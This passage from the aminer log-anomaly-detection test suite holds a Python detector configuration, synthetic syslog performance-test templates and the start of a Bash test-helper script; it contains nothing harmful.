fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', "de_AT.utf8", None)])) service_children_parsing_model_element.append(RepeatedElementDataModelElement( 'RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'drawn number: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append(SequenceModelElement('', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches. 
service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets # to the AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. service_children_parsing_model_element.append( OptionalMatchModelElement('OptionalMatchModelElement', FirstMatchModelElement('FirstMatchModelElement', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), AnyByteDataModelElement('AnyByteDataModelElement')]))) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers # later on. # Use this filter to distribute all atoms to the analysis handlers. 
atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_event_handler = SyslogWriterEventHandler(analysis_context) from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers = [stream_printer_event_handler, syslog_event_handler, mail_notification_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. 
from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. 
allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) 
histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis(analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter(sys.stdout, [ '/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from 
aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = 
TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) syslog_high_performance-template000066400000000000000000000161711437606560100343550ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 
2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 
2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:13 ubuntu user cron[28683]: Job `cron.daily` started. 
56 149 172 165 21 126 53 10 197 159 19 184 111 200 83 121 127 0 69 161 139 76 151 152 77 53 139 166 151 18 128 128 119 79 159 160 101 70 0 134 32 67 152 119 50 121 186 173 104 194 113 158 77 119 152 187 82 91 44 169 117 26 26 32 49 198 35 147 66 49 47 154 48 136 106 5 97 115 109 157 16 187 55 149 183 25 41 49 26 30 155 75 149 105 90 103 93 193 Random: 61646 Random: 81742 Random: 22454 Random: 61172 Random: 59230 Random: 57422 Random: 24186 Random: 13177 Random: 67097 Random: 77130 Random: 37168 Random: 42606 Random: 16250 Random: 16423 Random: 12743 Random: 47250 Random: 62026 Random: 28145 Random: 25117 Random: 11797 Random: 43684 Random: 56609 Random: 62107 Random: 57898 Random: 25565 Random: 40031 Random: 44657 Random: 34302 Random: 36463 Random: 7023 Random: 86129 Random: 41616 Random: 73781 Random: 83829 Random: 31521 Random: 42596 Random: 5687 Random: 58642 Random: 65931 Random: 57658 Random: 15693 Random: 7534 Random: 12311 Random: 56644 Random: 77670 Random: 14175 Random: 59887 Random: 11717 Random: 14783 Random: 15503 Random: 75391 Random: 18644 Random: 13260 Random: 51701 Random: 60789 Random: 13497 Random: 57472 Random: 35255 Random: 35782 Random: 43238 Random: 18718 Random: 44907 Random: 27974 Random: 75586 Random: 60078 Random: 60865 Random: 30213 Random: 19708 Random: 7868 Random: 62418 Random: 49624 Random: 8091 Random: 64423 Random: 53824 Random: 73947 Random: 14804 Random: 13523 Current Disk Data is: Filesystem Type Size Used Avail Use% % Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% User admin changed IP address to 10.0.0.224 User user changed IP address to 10.0.0.41 User guest2 changed IP address to 10.0.0.9 User guest2 changed IP address to 10.0.0.168 User guest2 changed IP address to 10.0.0.156 2019-09-19 16:33:50 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 
2019-09-19 16:33:56 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:02 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:07 ubuntu cron[50001]: Job `cron.daily' started 2019-09-19 16:34:08 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:15 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:16 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:21 ubuntu cron[50000]: Job `cron.daily' started User username logged in User root logged in syslog_low_performance_many_outputs-template000066400000000000000000000202041437606560100370560ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 
2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 
2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:13 ubuntu user cron[28683]: Job `cron.daily` started. 
56 149 172 165 21 126 53 10 197 159 19 184 111 200 83 121 127 0 69 161 139 76 151 152 77 53 139 166 151 18 128 128 119 79 159 160 101 70 0 134 32 67 152 119 50 121 186 173 104 194 113 158 77 119 152 187 82 91 44 169 117 26 26 32 49 198 35 147 66 49 47 154 48 136 106 5 97 115 109 157 16 187 55 149 183 25 41 49 26 30 155 75 149 105 90 103 93 193 Random: 61646 Random: 81742 Random: 22454 Random: 61172 Random: 59230 Random: 57422 Random: 24186 Random: 13177 Random: 67097 Random: 77130 Random: 37168 Random: 42606 Random: 16250 Random: 16423 Random: 12743 Random: 47250 Random: 62026 Random: 28145 Random: 25117 Random: 11797 Random: 43684 Random: 56609 Random: 62107 Random: 57898 Random: 25565 Random: 40031 Random: 44657 Random: 34302 Random: 36463 Random: 7023 Random: 86129 Random: 41616 Random: 73781 Random: 83829 Random: 31521 Random: 42596 Random: 5687 Random: 58642 Random: 65931 Random: 57658 Random: 15693 Random: 7534 Random: 12311 Random: 56644 Random: 77670 Random: 14175 Random: 59887 Random: 11717 Random: 14783 Random: 15503 Random: 75391 Random: 18644 Random: 13260 Random: 51701 Random: 60789 Random: 13497 Random: 57472 Random: 35255 Random: 35782 Random: 43238 Random: 18718 Random: 44907 Random: 27974 Random: 75586 Random: 60078 Random: 60865 Random: 30213 Random: 19708 Random: 7868 Random: 62418 Random: 49624 Random: 8091 Random: 64423 Random: 53824 Random: 73947 Random: 14804 Random: 13523 CPU Temp: 62°C, CPU Workload: 82%, 2019-09-19 16:33:39 CPU Temp: 30°C, CPU Workload: 77%, 2019-09-19 16:33:39 CPU Temp: 42°C, CPU Workload: 62%, 2019-09-19 16:33:39 CPU Temp: 31°C, CPU Workload: 43%, 2019-09-19 16:33:40 CPU Temp: 84°C, CPU Workload: 77%, 2019-09-19 16:33:40 CPU Temp: 43°C, CPU Workload: 34%, 2019-09-19 16:33:40 CPU Temp: 59°C, CPU Workload: 56%, 2019-09-19 16:33:40 CPU Temp: 61°C, CPU Workload: 44%, 2019-09-19 16:33:41 Current Disk Data is: Filesystem Type Size Used Avail Use% % Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk 
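Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% User admin changed IP address to 10.0.0.224 User user changed IP address to 10.0.0.41 User guest2 changed IP address to 10.0.0.9 User guest2 changed IP address to 10.0.0.168 User guest2 changed IP address to 10.0.0.156 2019-09-19 16:33:50 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:33:56 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:02 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:07 ubuntu cron[50001]: Job `cron.daily' started 2019-09-19 16:34:08 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:15 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:16 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:21 ubuntu cron[50000]: Job `cron.daily' started User username logged in User root logged in User user logged in 6 minutes ago. User root logged in 6 minutes ago. dafsdff12%3§fasß?–_=yy VXNlcm5hbWU6ICJ1c2VyIgpQYXNzd29yZDogInBhc3N3b3JkIg== Current DateTime: 19.09.2019 16:34:26 -25878952156245.222239655488955 - 3695465546654 This is some part of a csv file; match data: 25000 b654686973206973206a7573742061206e6f726d616c2074657874 Gateway IP-Address: 192.168.128.225 Feb 25 2019 The-searched-element-was-found! drawn number: 38drawn number: 30drawn number: 15drawn number: 5drawn number: 9 --------------------------------------------------------------------- lbtujyvysrcry logdata-anomaly-miner-2.6.1/aecid-testsuite/testFunctions.sh000077500000000000000000000046351437606560100242200ustar00rootroot00000000000000
#!/bin/bash
# Shared helper functions for the aecid-testsuite shell tests.

# testConfigError LOGFILE MESSAGE
#   Scans LOGFILE (aminer output) for indicators of a broken run: unparsed
#   atoms, a Python traceback, a dumped parser config, FATAL or Config-Error.
#   On a hit it prints MESSAGE followed by the whole log and returns 1.
#   Returns 0 when the log is clean, 1 when called with the wrong number of
#   arguments.
function testConfigError() {
  RET=0
  # The previous test "[[ !$# -eq 2 ]]" could never fire: "!$#" is a single
  # word ("!2") that arithmetic evaluation turns into 0, so "0 -eq 2" was
  # always false. Compare the argument count explicitly.
  if [[ $# -ne 2 ]]; then
    echo
    echo "testConfigError() needs exactly 2 parameters!"
    return 1
  fi
  # grep -q prints nothing; its exit status alone decides the branch. The
  # file name is quoted so paths containing spaces are handled.
  if [[ $(grep -ic "VerboseUnparsedAtomHandler" "$1") != 0 ]] \
      || grep -Fq "Traceback" "$1" \
      || grep -Fq "{'Parser'" "$1" \
      || grep -Fq "FATAL" "$1" \
      || grep -Fq "Config-Error" "$1"; then
    echo "$2"
    RET=1
    cat "$1"
    echo
    echo
  fi
  return $RET
}

# compareStrings FIRST SECOND MESSAGE
#   Returns 0 when FIRST equals SECOND; otherwise prints FIRST, MESSAGE and
#   SECOND (separated by blank lines) and returns 1. Returns 1 on a wrong
#   argument count.
function compareStrings() {
  RET=0
  # Same fix as in testConfigError: count the arguments explicitly.
  if [[ $# -ne 3 ]]; then
    echo
    echo "compareStrings() needs exactly 3 parameters!"
    return 1
  fi
  if [[ "$1" != "$2" ]]; then
    echo "$1"
    echo
    echo "$3"
    echo
    echo "$2"
    echo
    RET=1
  fi
  return $RET
}

# compareVersionStrings V1 V2
#   Compares two dotted version strings numerically, component by component,
#   after dropping any "-suffix" (e.g. "2.6.1-1" compares as "2.6.1"). Only
#   the components present in both versions are compared, so "2.6" and
#   "2.6.1" count as equal.
#   Returns 0 when equal, 1 when V1 > V2, 2 when V1 < V2 and 255 on a wrong
#   argument count.
function compareVersionStrings(){
  # Same fix as in testConfigError: count the arguments explicitly.
  if [[ $# -ne 2 ]]; then
    echo "compareVersionStrings() needs exactly 2 parameters!"
    # A return status is the operand's least significant 8 bits, so -1 would
    # collapse to 255 anyway; some bash versions reject a negative operand.
    return 255
  fi
  IFS='-' read -ra VERSION <<< "$1"
  VERSION="${VERSION[0]}"
  IFS='.' read -ra V1 <<< "$VERSION"
  IFS='-' read -ra VERSION <<< "$2"
  VERSION="${VERSION[0]}"
  IFS='.' read -ra V2 <<< "$VERSION"
  LEN1=${#V1[@]}
  LEN2=${#V2[@]}
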